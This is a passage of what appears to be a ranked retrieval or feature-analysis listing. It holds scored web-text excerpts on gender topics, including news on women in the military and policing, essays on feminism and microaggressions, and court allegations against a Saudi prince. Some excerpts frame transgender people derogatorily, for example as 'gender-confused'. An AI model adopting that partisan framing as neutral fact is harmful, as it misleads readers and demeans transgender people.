in the top few percent of my high school physics class),” she says. + +The Guardian reports: + +The problem is these biases are often subtle. It’s these micro-inequities that do the most damage – the small, seemingly inconsequential ways in which people are excluded or discounted that, over time, erode confidence, value and worth and reinforce a culture that is not inclusive. BD: Has there been a moment in your career when you’ve been uncomfortably reminded of your gender? JR: It’s that thought in the back of your mind: am I getting this opportunity because I’m qualified, or because I’m female? Hopefully the former, but perhaps sometimes it might be the latter. I’d like to be known as a scientist, not a female scientist – maybe, if possible, a good scientist. The relevant point here is that typically we wouldn’t ever ask a man this same question when asking him about his career. BD: Have you been encouraged to modify behavior in masculine environments? JR: Astronomy is a very male-dominated field – this is evident in the office, at conferences, in committee memberships. I can’t recall ever being actively told to modify my behaviour, [but] having said that, it takes a certain resilience and personality to be comfortable and successful when you’re a minority in your field. You often need a pretty thick skin, you can’t be easily offended. + +So, even though none of her teachers made any point about her being female (and who, by the way, probably had a very good idea about her academic abilities), and though she can’t recall any “active” request to change her behavior in the male-dominated arena, it’s just “that thought in the back of [her] mind …” + +Not to mention, Rathborne bemoans a “non-inclusive culture” … yet wonders if she got her position merely because of her gender? + +Wow. + +Read the full article. + +Like The College Fix +================================================================================ +Rank = 5; Score = 688128.0 +<|begin_of_text|>BANGKOK (Reuters) - Thai transsexual ladyboys are taking to the air as flight attendants for a new airline, a move that some said could be a key step towards still broader acceptance in a nation where they are already unusually visible. + +PC Air transsexual flight attendants (L to R): Phuntakarn Sringern, 24, Nathatai Sukkaset, 26, Chayathisa Nakmai, 24, and Dissanai Chitpraphachin, 24, pose for photographers in a PC Air aircraft at Bangkok's Suvarnabhumi International Airport December 15, 2011. REUTERS/Chaiwat Subprasom + +Known as “katoeys” or “ladyboys,” transgenders and transsexuals hold mainstream jobs in a variety of fields in Thailand. They are especially common in cosmetics shops or health stores, which almost always have a ladyboy shop assistant. + +Working for new charter airline PC Air, transsexual flight attendants including 22-year-old Tanyarat Jirapatpakorn made their debut on a flight from Bangkok to the southern city of Surat Thani on Thursday, serving drinks and snacks and carrying out safety demonstrations. + +“This is the beginning of the acceptance of transsexuals in Thailand, giving the opportunity for us to work in various fields,” said Tanyarat. + +“Maybe in the future we can get any job that transsexuals never did before, such as police, soldiers or even pilots.” + +PC Air, whose name comes from the initials of president Peter Chan, originally planned only to hire male and female flight attendants, but changed its mind after more than 100 transsexuals and transvestites applied as well. + +Four were chosen, along with 19 female and 7 male flight attendants. The airline said qualifications for the ladyboy flight attendants were the same as for female flight attendants, with the additional provisos that they be like women in how they walked and talked, and have a feminine voice. + +Chan, the airline president, said the ladyboy flight attendants actually might have a special advantage. + +“They might provide better services because they understand both males and females. And they’re well trained according to the aviation standard,” he added. + +The new recruits were chosen in February and have been training since in security measures, in-flight services, and make-up application. + +PC Air flies domestically as well as to several Asian destinations, including Japan and South Korea.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 6; Score = 659456.0 +<|begin_of_text|>Not too long ago we saw that the people of Toronto have no sympathy for a male rape victim. In a disgusting display the Toronto Twitterverse summarily dismissed the idea of a male rape victim by telling him he should be so lucky as to be attacked by four women, that he was lying, that he was gay or a prostitute, and that his victimisation doesn’t matter. + +Cretins like Rosie DiManno came forward to say that “one man’s sexual assault is another man’s fantasy come true” and display a fundamentally flawed understanding of the very basic understanding of what rape is. Rape is forced, unwanted sexual interaction. You cannot want to be raped, because if you wanted it, it wouldn’t be rape. + +The man, who decided (for what seems to be good reason considering the amount of ridicule he received) to stay anonymous, was a laughing stock to his peers, men and women who thought simply that a man can’t be raped. This reaction leaves me wondering just how many male rape victims have refused to step forward or seek police intervention or even counselling simply because they have been told time and time again that a man cannot be a rape victim, that they should have enjoyed it, or that in the stereotype of a man always wanting sex they were asking for it simply by being male. + +With all of the time, energy, funding, and attention that is given to preventing rape why is it that the average Joe or Jane still can’t wrap their head around this? + +Well first let’s take a quick look at the definition of rape. Until recently this was what Google returned: + +Google’s victims are gender neutral; however, their aggressors are male. + +A Google Image search for “how to stop rape” also brings up countless images where men who might otherwise be aggressors are told not to rape or are congratulated on stopping when told. + +What is surprising is the heteronormative gender binary approach to rape as a topic. Men rape, women are raped. There is very little discussion in between for men who are raped by men, women who are raped by women, and men who are raped by women, like the victim in Toronto. + +The response I’ve heard is that because the number of rapes that is reported in these scenarios is lower that it isn’t worth the time. I can think of one young man whose experience and entire existence was deemed worthless by the internet who might disagree. This notion may also be a beast that feeds itself: if no attention is given to these matters because they are reported less, when +================================================================================ +Rank = 7; Score = 651264.0 +<|begin_of_text|>Progressive activists are forcing public schools to teach and practice gender ideology in the name of civil rights, but more American students and their parents are saying “no” to the demands made on behalf of a minority who claim to be the opposite sex. + +In Portland, Oregon, parents of high school students have filed a federal lawsuit over the school district’s policy that allows a biological female student who claims to be male to use the boys’ locker room and bathroom. + +The lawsuit is similar to one filed in Palatine, Illinois last year where, as the Chicago Tribune reported in October 2016, U.S. Magistrate Judge Jeffrey Gilbert ruled that high school students “do not have a constitutional right not to share restrooms or locker rooms with transgender students whose sex assigned at birth is different than theirs.” + +The Portland lawsuit claims the Dallas School District’s policy to allow a 16-year-old female – Elliot Yoder – to use the boys’ facilities violates the civil rights of the majority of the students who are not gender-confused, the Associated Press observes. + +The Oregon chapter of the ACLU argues the parents’ lawsuit is “senseless and cruel” and “targets transgender youth for simply existing and seeking an education.” + +However, Herb Grey, the parents’ attorney, says boys who use the facilities at the school are embarrassed to get undressed in front of a biological female. + +“The key to this whole thing is not just the privacy and the rights of just one student,” Grey explains. “It’s the rights of all the students and their parents and you can’t interpret federal law and state law and impose it on everyone else and say you’re accommodating everyone — because you’re not accommodating everyone.” + +Yoder reportedly asked to use the boys’ facilities for changing before gym class because the gender-neutral bathroom is on another floor and other students noticed when she left to change. + +Two years ago, when the Dallas school district first informed parents it would be accommodating a biological female who claimed to be male by allowing her to use the boys’ facilities, the enraged parents came together to protest at a school board meeting. + +In May 2016, students at Green Mountain Union High School in Chester, Vermont also pushed back against the school’s transgender policy that was allowing a female student who claims to be male to use the boys’ facilities. + +As Breitbart News reported, the students argued it is unfair to make the majority of students feel uncomfortable to satisfy the demands of a small minority. + +Similarly, in September of 2015, 150 students in Missouri organized a protest against their school +================================================================================ +Rank = 8; Score = 638976.0 +<|begin_of_text|>Martin Freeman and Graham McTavish in The Hobbit: An Unexpected Journey. + +Photo courtesy James Fisher/2012 Warner Bros. Entertainment Inc./Metro-Goldwyn-Mayer Pictures + +My 5-year-old insists that Bilbo Baggins is a girl. + +The first time she made this claim, I protested. Part of the fun of reading to your kids, after all, is in sharing the stories you loved as a child. And in the story I knew, Bilbo was a boy. A boy hobbit. (Whatever that entails.) + +But my daughter was determined. She liked the story pretty well so far, but Bilbo was definitely a girl. So would I please start reading the book the right way? + +I hesitated. I imagined Tolkien spinning in his grave. I imagined mean letters from his testy estate. I imagined the story getting as lost in gender distinctions as dwarves in the Mirkwood. + +Then I thought: What the hell, it’s just a pronoun. My daughter wants Bilbo to be a girl, so a girl she will be. + +And you know what? The switch was easy. Bilbo, it turns out, makes a terrific heroine. She’s tough, resourceful, humble, funny, and uses her wits to make off with a spectacular piece of jewelry. Perhaps most importantly, she never makes an issue of her gender—and neither does anyone else. + +Despite what can seem like a profusion of heroines in kids’ books, girls are still underrepresented in children’s literature. A 2011 study of almost 6,000 children’s books published between 1900 and 2000 showed that only 31 percent had female central characters. While the disparity has declined in recent years, it persists—particularly, and interestingly, among animal characters. And many books with female protagonists take place in male-dominated worlds, peopled with male doctors and male farmers and mothers who have to ask fathers for grocery money (Richard Scarry, I’m looking at you). The imbalance is even worse in kids’ movies: Geena Davis’ Institute on Gender in Media found that for every female character in recent family films, there are three male characters. Crowd scenes, on average, are only 17 percent female. + +More insidiously, children’s books with female protagonists sometimes celebrate their heroine to a fault. Isn’t it amazing that a girl did these things, they seem to say—implying that these heroines are a freakish exception to their gender, +================================================================================ +Rank = 9; Score = 630784.0 +<|begin_of_text|>Hi! Thanks for reaching out. I think it’s always useful to educate yourself on subjects you don’t know a lot about, so props to you for reading into new materials. I’ve taken screenshots of each question, so hopefully I can answer thoroughly! After a quick read through, though, it does seem like you’re confusing a portion of radical feminism with liberal feminism, so I’ll be certain to highlight those differences as we go. Okay! + +1. + +Firstly, radical feminism isn’t a new wave so much as a return to the values of second wave feminism, which is being championed by a new generation! Our collective goal is the liberation of women from historical and societal structures that bind them, working with an understanding that women suffer from sexism, or sex- based oppression. While we may have differing ideas on how to accomplish this goal, or the best route to take, you’ll universally see womens liberation on the forefront of our messages! Radfems agree that gender is a social class we ascribe to biology, that gender is the expectations and socializations we apply to our own innate biology! I.e. women are submissive, caring, like pink, will be mothers, will wear makeup…and men are strong, and unemotional, like blue, will be providers, will cut their hair short. Radical feminists say “we shouldn’t live in these boxes! Our biology doesn’t determine our interests, our abilities, who we love, or what we want to do with our life!” Radical feminists want a dismantling of gender roles, specifically because they are used to subjugate women. + +2. + +Radical feminism is for women, and liberating women, and it does so unapologetically. We understand that our feminism focuses on sex- based oppression - our sex being female. No radical feminists are trans exclusive. Trans men are as affected by female bodily autonomy (deserving access to female medical care, cervical screenings, breast exams, abortions, birth control, menstruation) as any woman. They deserve respect in the unique challenges they face in the cross section of transphobia and misogyny they face in the world. They deserve spaces free of male violence. The policies we pursue reflect that. People use the term “trans exclusive” because trans women do not play a role in our activism, as they are male-bodied and therefore do not experience sex-based oppression. + +SWERF is interesting, isn’t it? I am not anti-sex workers at all. I am against the sex work industry. The term +================================================================================ +Rank = 10; Score = 622592.0 +<|begin_of_text|>I am hideously white, and not a man but “male”. Being over 50, I suffer the added failing of being disgustingly old. Such are the routine humiliations of my group. The BBC was called hideously white by its former boss Greg Dyke, and the West End stage hideously white by Andrew Lloyd Webber. This week the Football Association was dismissed by critics as a bunch of “old white men”. Note that it is not the BBC or the theatre that is hideous, but their whiteness. + +Blame the identity apostles – they led us down this path to populism | Simon Jenkins Read more + +Fashion in collective abuse seeks comfort in crowds. In choosing “pale, stale males” (PSMs) for ritual contempt, identity politics has found a target that it hopes will confess its “guilt”. More recently the epithet “failed” has been added to explain the Brexit/Trump voters. These PSMs are further damned by being uneducated “left-behinders”, and therefore also dumb. They were thought so dumb it was suggested they vote again on Brexit, for having got it wrong first time. + +Were someone such as I to take offence, demand redress or “protected space”, I would be bidden to shut up, get a life and not be so sensitive. I might plead, with Shylock: “Hath not a [pale, stale male] hands, organs, dimensions, senses, affections, passions? If you prick us, do we not bleed?” I might turn to Kant and universalise the judgment. What if I were to follow “hideously” with black, female, Jewish, Arab, obese, disabled or Welsh? Is the representation of black footballers in the Premier League (as opposed to the Football Association) “hideously black”? + +The reality is that PMSs are expected to take all this in their stride. They were, after all, the old hegemons. They dished out discrimination; now they should accept a taste of their own medicine. (Or will someone protest that this is patronising: why should PSMs refuse to take offence, as does everyone else?) This is, of course, fair enough – except two wrongs do not make a right. Besides, identity liberalism is surely more than the politics of tit-for-tat. It is a straining after a sort of equality of treatment. + +I have no quarrel with this week’s accusations levelled at the Football Association +================================================================================ +Rank = 11; Score = 618496.0 +<|begin_of_text|>Prince Majed bin Abdullah bin Abdulaziz Al Saud is accused of doing cocaine, getting drunk and forcing himself on three female members of staff, exclusively obtained court documents reveal + +A Saudi Arabian prince is accused of a having sexual relationship with a male aide, taking cocaine and threatening to kill women who refused his advances - as well as sexually assaulting a maid – Daily Mail Online has exclusively learned. + +Prince Majed bin Abdullah bin Abdulaziz Al Saud – revealed by Daily Mail Online yesterday to be son of the late King Abdullah – now faces an extraordinary series of allegations in a civil case brought by three female staff members of his Los Angeles mansion. + +Court documents seen by Daily Mail Online disclose how he is accused of being drunk and high at his $37 million mansion in Beverly Hills and repeatedly making unwanted sexual advances. + +The documents were filed by lawyers acting for three female employees of Al Saud. + +They include a claim that the royal attempted to urinate on the trio while screaming: 'I want to pee pee'. + +He also threatened to kill one of the women if she refused to 'party' with him and jumped on top of another and began rubbing himself against her in a'sexual and aggressive manner'. + +When asked to stop, Al Saud allegedly then yelled: 'I am a prince and I do what I want. You are nobody!' + +All three of the women claim to have seen the royal having his penis'stroked' by a male aide and say they were forced to stay in the room and watch as the encounter unfolded. + +Homosexuality is illegal in Saudi Arabia, and punishable by flogging, or even execution. + +Another says she was made to watch while a different male aide bent over and broke wind in Al Saud's face – apparently at his request. + +Scroll down for video + +Felony charges against Al Saud (left) were dropped by the Los Angeles District Attorney but prosecutors can now bring misdemeanor charges against him + +Al Saud rented this $37 million Beverly Hills mansion where it's alleged he threw two back-to-back parties with escorts and forced female workers to watch as a male aide pleasured him + +The revelations about Prince Majed come a day after it was revealed that Los Angeles District Attorney has decided to drop felony charges against the 29-year-old due to lack of evidence. + +Instead, the case has been passed to LA city attorney Mike Feur who will now decide whether to pursue misdemeanor charges – which could lead to a year in jail and a $3,000 fine should he be convicted. + +But lawyers for the women bringing the civil case say +================================================================================ +Rank = 12; Score = 602112.0 +<|begin_of_text|>In that crucial period before tenure, assistant professors must publish or perish. Co-authoring a paper with a senior faculty member down the hall can make all the difference. But at least for female psychologists, that collaborator tends to be male, even when there are female full professors available, according to a new study. The authors say that the findings may reveal yet another barrier toward women advancing in academia. + +The researchers honed in on psychology because of all the scientific fields they examined, it had the highest prevalence of high-ranking women. They surveyed 50 psychology departments at U.S. and Canadian universities. More than other scientific fields, psychology is heading for gender parity, though it’s not there yet. While the gender ratio of assistant professors is almost exactly even, with slightly more females, full-professor males still outnumbered females 2 to 1 in their data. + +The researchers surveyed the psychologists’ research publications from 2008 to 2011. Because the study focused on collaborations within departments, they focused only on the 459 papers that had a full professor and one other member of the same department as co-authors. Such collaborations can make all the difference for junior faculty. If they don’t publish major papers within 6 years, they are unlikely to make tenure, which can often spell doom for their academic careers. Then they tallied how many of those collaborations happened between two full professors or across ranks—a full professor co-authoring with an assistant professor—and calculated the gender ratios. Of course, even if collaboration is completely gender-blind, those gender ratios would not be equally split between male-male and male-female pairs, because there are twice as many male full professors and the rate of publication varies between departments. So the team calculated what the expected gender ratios would be if the psychologists in their study were just randomly collaborating with members of their own departments. If the published papers match those expected ratios, then that would indicate that gender does not play a large role in the collaborations of psychologists within their departments. + +That’s not what the researchers found. In a 4-year period, female full professors co-authored only 14 papers with female junior faculty members in their departments, half as many as expected, the team reports online today in Current Biology. Female full professors did collaborate as much as expected with female peers in their departments, as well as male junior faculty. + +Female academics face several challenges that their male colleagues don’t, says lead author Joyce Benenson, a psychologist at Emmanuel College in Boston (who co-authored the paper with Richard Wrang +================================================================================ +Rank = 13; Score = 585728.0 +<|begin_of_text|>When I first saw the trailer for Disney’s upcoming film, Zootopia, one of the things that struck me first (in addition to the HILARITY of the sloth DMV employee getting a joke) was the fact that, in this movie that seems to be about biases and bigotry, the lead was a female character! It was so clear that gender-related bias was one of the things this film was going to examine and challenge. After all, with Nick the fox saying “You bunnies. Always so emotional,” that had to be on purpose, right? Apparently not. + +In a recent interview with io9 the director of Zootopia, Byron Howard, tells the story of how originally, the main character of this film wasn’t supposed to be Judy Hopps, the police officer bunny, but Nick the con artist fox. Back in November 2014, after years of production, the team behind the film realized that the story didn’t make sense with Nick as the lead, even though that was the version of the story that was in the original pitch and the original script. Howard explains: + +We’re telling a story about bias, and when you have the Nick character starting the movie, through his eyes the city was already broken. He didn’t like Zootopia. We asked ‘What are we saying with the movie?’ If we’re telling this movie about bias—something that is everywhere and in all of us, whether we want to admit it or not—the character that’s going to help us tell that message is Judy, an innocent, [who comes] from a very supportive environment where she thinks everyone is beautiful, everyone gets along. Then let Nick, this character who knows the truth about the world, bop up against her and they start to educate each other. When we flipped that, it was a major flip, but it worked so much better. + +That does, indeed, make a lot of sense. What’s interesting to me, though, is that nowhere in this rationale does it say “In this movie about bias, the character that’s going to help us tell that message is Judy, a female character who constantly faces bias herself.” Gender is mentioned nowhere in this interview. It’s so strange to me that making the female character the lead of a movie about biases wasn’t the original, obvious choice! What’s more, even after giving it thought, it seems like the fact that the character is female wasn’t the obvious thing that made them decide “you know what? She would be a +================================================================================ +Rank = 14; Score = 577536.0 +<|begin_of_text|>WASHINGTON D.C. -- For the first time an enlisted female sailor has earned her submarine qualification, U.S. naval officials said, as she joined the growing number of women who are in the Navy's "silent service." + +Chief Petty Officer Dominique Saavedra received her silver dolphin pin in a ceremony Tuesday at Puget Sound Naval Shipyard in Bremerton, Washington. She will be deploying on a nuclear-powered guided missile submarine, the USS Michigan. + +The first female enlisted sailors began training for submarine duty about a year ago. In addition to Saavedra, there are about three dozen other enlisted women assigned to submarines, working to get their qualifications. To become qualified, Saavedra, who is a cook, had to show proficiency and knowledge about all aspects of submarine systems. + +First female Army Rangers graduate + +"I couldn't be more proud to wear the 'dolphins,'" said Saavedra, in a prepared statement. "To have earned the respect of my fellow submariners is more rewarding than expected." + +She earned her qualifications aboard the USS Ohio because the USS Michigan has been in port for maintenance, including modifications to living quarters in order to accommodate female chief petty officers and enlisted crew members. It is expected to set sail for the first time with female crew later this year. + +The Navy ended a ban on women serving aboard submarines in 2010 and began integrating crews by first introducing female officers, who already have been assigned to ballistic-missile and fast-attack submarines. The ballistic-missile submarines make up the sea-based leg of the U.S. nuclear triad. The other two segments are the bomber aircraft and the land-based intercontinental ballistic missiles. + +There are about 115 female officers training to become submariners, and so far, 43 female officers have earned their dolphin qualifications. + +According to the Navy, the goal is to have enlisted women will make up about 20 percent - or roughly 29 - of each Ohio-class submarine crew. + +Applications for the next round of training for enlisted women will begin in October, and those selected would serve aboard the USS Ohio. + +A survey sent to more than 50,000 enlisted female sailors early last year found there was significant but not overwhelming interest in submarine duty. Of the 12,700 sailors who participated, 28.5 percent indicated they would be open to volunteering for submarine service. + +The Navy has been at the forefront of the Pentagon's move to open all military jobs to women. After several years of study and planning, Defense Secretary Ash Carter formally declared all combat jobs - +================================================================================ +Rank = 15; Score = 573440.0 +<|begin_of_text|>Citizens have 911. Employees have the EEOC. Distressed sailors have the Coast Guard. + +But what do America’s college students have? Where can they turn when they find themselves outside campus “safe spaces” and suffering a “microaggression”? + +Fortunately, the University of Arizona has an answer. It recently distributed a 20-page booklet suggesting to faculty that when a student is victimized by a microaggression the appropriate response should be saying “ouch.” And the correct response for the offender should be saying “oops,” according to the guide. + +THE WEEK IN PICTURES + +“If a student feels hurt or offended by another student’s comment, the hurt student can say ‘ouch.’ In acknowledgement, the student who made the hurtful comment says “oops.” If necessary, there can be further dialogue about this exchange.” + +The guide was authored by Jesus Treviño, vice provost of the big taxpayer-funded university, whose salary reportedly is $214,000 per year. + +For those unfamiliar with the apparently epidemic scale of microaggression and thus not able to spot such offenses, the booklet offers a definition: Microaggressions are “the everyday verbal, nonverbal, and environmental slights, snubs or insults, whether intentional or unintentional, that communicate hostile, derogatory, or negative messages to target persons based solely upon their marginalized group membership.” + +The University of Arizona isn’t the first to suggest the “ouch”/”oops” protocol. Iowa State University, among others, has also urged a similar approach.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 16; Score = 561152.0 +<|begin_of_text|>Citing an urgent need to address gender-based harassment, discrimination and bullying, a group of current and former police officers has established a national advocacy group to support female cops in a workplace where they say women are too often treated as outsiders. The National Women in Law Enforcement Association will represent a growing group of women officers alleging discrimination and harassment on the job — and who believe there is little recourse, according to organizers. + +Const. Angelina Rivers says women in the field of policing are "in distress right now." ( Michelle Siu for The Waterloo Record ) + +“Women in policing, they’re in distress right now,” says Waterloo police Const. Angelina Rivers, who is part of a proposed class-action lawsuit against the Waterloo police board and its union alleging gender-based bullying, misconduct and more. “Women are leaving policing in droves, and there’s a reason for that,” she says. Recent research examining the experience of female officers in Canada has raised concerns about the persistence of an “old boys” club’ within policing, even as more women sign onto the force. + +Article Continued Below + +In her study of female police officers in Ontario, Lesley Bikos, a former London, Ont. officer now pursuing her PhD studying police culture at Western University, found officers regularly subjected to verbal harassment — including being called “badge bunny” or a “tomboy” — and having to withstand hearing sexist jokes. Women officers also had to work harder to earn the respect automatically granted to their male counterparts and hesitated calling for backup out of fear of being called weak, Bikos found. Officers who become mothers, meanwhile, face another set of challenges, including being passed over for promotions because of a perception they won’t be as dedicated, according to research out of Wilfrid Laurier University. The new women’s policing advocacy group seeks to be both a support network for female police officers and group lobbying for change at the municipal, provincial and federal levels, according to its founders. Rivers said the group was born out of the realization that the ongoing proposed lawsuit against Waterloo police will take years to work its way through the courts. That’s time female officers be facing discrimination do not have, she said. The proposed lawsuit, which is seeking more than $165 million on behalf of past and present female Waterloo police officers, alleges a sexist workplace culture that subjects some female staff to verbal, physical and sexual harassment. + +None of the allegations have been tested in court. The Waterloo Police Services Board has said it would challenge the suit, calling it “inappropriate” and saying filing +================================================================================ +Rank = 17; Score = 544768.0 +<|begin_of_text|>Men and women make moral decisions differently, according to new research published in Personality and Social Psychology Bulletin — but not necessarily in the ways scientists thought before. + +The study, a meta-analysis of 40 studies with 6,100 total participants, revealed a more nuanced distinction between two common schools of moral thought. + +Deontology vs. Utilitarianism + +“Consider…a dilemma where you are hiding with other townsfolk from murderous soldiers,” says Rebecca Friesdorf, the corresponding author. “Suddenly a baby starts to cry—unless you smother it, the soldiers will find and kill everyone. Should you smother the baby to prevent the soldiers from killing the townsfolk?” + +According to deontology, killing the baby would be wrong because murder is wrong, despite the potential consequences. Deontology puts moral norms at top priority. + +According to utilitarianism, killing the baby is acceptable because it will save many lives in the end. Utilitarianism considers the overall consequences more important. + +Deontology has long been associated with emotional responses to moral dilemmas, while utilitarianism is associated with cognitive, or mental, responses. Previous research has claimed that the two are opposites, and that women make more deontological decisions while men make more utilitarian decisions. However, the current study suggests it’s not so simple. + +The Study + +The research team, comprised of scientists from three universities in three different countries, believes that deontology and utilitarianism are not necessarily opposites—either thought process could be affected by a number of factors. In order to examine them independently, the team used a method called Process Dissociation (PD) to separate the variables. PD has been used previously to separate other controversial variables, such as racial bias in weapon identification. + +“To…distinguish whether men are more utilitarian than women, or women are more deontological than men, it is necessary to measure [these]inclinations independently,” said Friesdorf. + +The Results + +The findings from the study challenge the traditional theory that men prefer cognitive decisions and women prefer emotional ones. After separating the variables, researchers discovered that men and women use cognitive reasoning about equally. However, women were much more likely to use emotional reasoning than men when one factor is involved: harm. + +When asked a moral dilemma question that did not involve harm, women and men both tended to use utilitarian (or cognitive) thinking. However, when asked a moral dilemma question involving harm, women were significantly more likely to use deontological (emotional) thinking than men. + +“The current findings +================================================================================ +Rank = 18; Score = 544768.0 +<|begin_of_text|>Over the past few years, a significant problem within games has become much more apparent: there is a lack of playable female characters. This new Feminist Frequency video gets a little more specific than that, asking why there are hardly any female combatants in video games. + +The video begins with the notorious example of Ubisoft’s gaffe regarding why there were no playable female characters in Assassin’s Creed: Unity‘s cooperative mode. Many of the excuses could be summed up in a now-infamous phrase: “women are too hard to animate.” At the end of the day, it felt like what Ubisoft was really saying was that they just didn’t care to add female characters. While they’ve since changed their tune (see: Assassin’s Creed: Syndicate), there’s still something left to be desired elsewhere throughout gaming. + +From there, the video enters into some more interesting territory in trying to understand why there are no non-sexualized female combatants. They correctly point out that when female enemies are included in a video game, the player is encouraged to engage in sexual or gender-based violence against these characters. As well, they’re all often placed into some incredibly titillating, often demeaning costumes that emphasize their sexuality over anything else (see: Saints Row: The Third‘s “Whored Mode,” and Hitman: Absolution). + +In addition to this, the video makes a strong case as to why including more non-sexualized female combatants doesn’t necessarily promote violence against women. Put simply: when female enemies are presented as equals to the player and as active participants in whatever action is going on, then it doesn’t exactly count as violence against women—at least, not in the way that we all talk about in video games. + +If you haven’t checked it out already, the video is well worth a watch in that it does a great job of recapping some of the more major controversies regarding female combatants and female playable characters while breaking down and analyzing some of the more recent trends we’ve seen. + +—The Mary Sue has a strict comment policy that forbids, but is not limited to, personal insults toward anyone, hate speech, and trolling.— + +Follow The Mary Sue on Twitter, Facebook, Tumblr, Pinterest, & Google+.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 19; Score = 540672.0 +<|begin_of_text|>But John Korff, owner of the New York City Triathlon, said he would not bar Mosier from competing. + +“This is an age grouper who is out to have fun, God bless him,” Korff said. “And I don’t think anybody is getting an inherent advantage going from a woman to a man.” + +The question of performance gains because of gender change has hindered transgender female athletes for decades. The United States Tennis Association barred the transgender tennis player Renée Richards from playing as a woman in the 1976 United States Open. The golfer Lana Lawless, who had gender reassignment surgery in 2005, sued the L.P.G.A. in 2010, claiming that the league’s “female at birth” rule violated California civil rights law. Michelle Dumaresq, a former Canadian downhill mountain biking champion, eventually left her sport after other Canadian racers protested her involvement. + +Transgender male athletes like Mosier have not experienced the same legal hurdles. In 2010, the N.C.A.A. cleared Kye Allums, who identifies as male but was born female, to play for the George Washington University women’s basketball team, provided Allums did not undergo testosterone treatment. + +That does not mean female-to-male athletes have an easy life in sports. Helen Carroll, sports project director for the National Center for Lesbian Rights, said transgender males often face harsher social pushback than transgender females. + +Photo + +“Oddly enough, the worst behavior in terms of teasing, taunting and threats is against female-to-male athletes,” Carroll said. “There is the belief that even with testosterone, a woman can’t be as competitive as a man.” + +Mosier says he still experiences intimidation because of his gender on a regular basis, and he declined to name his place of employment or his hometown for fear of reprisal. But the tension he faces as a transgender athlete, Mosier said, is less than it was when he was a female athlete who identified as male. + +“It is difficult to see old photos of myself, or to think about past memories, because there were some really unhappy moments during those times,” Mosier said. + +Newsletter Sign Up Continue reading the main story Please verify you're not a robot by clicking the box. Invalid email address. Please re-enter. You must select a newsletter to subscribe to. Sign Up You will receive emails containing news content, updates and promotions from The New York Times. You may opt-out at any time. You agree to receive occasional updates and special offers for +================================================================================ +Rank = 20; Score = 540672.0 +<|begin_of_text|>Female college students are more likely to abandon studies in science, technology, engineering and math (STEM) disciplines than their male classmates, and new research from the University of Washington suggests that those male peers may play a key role 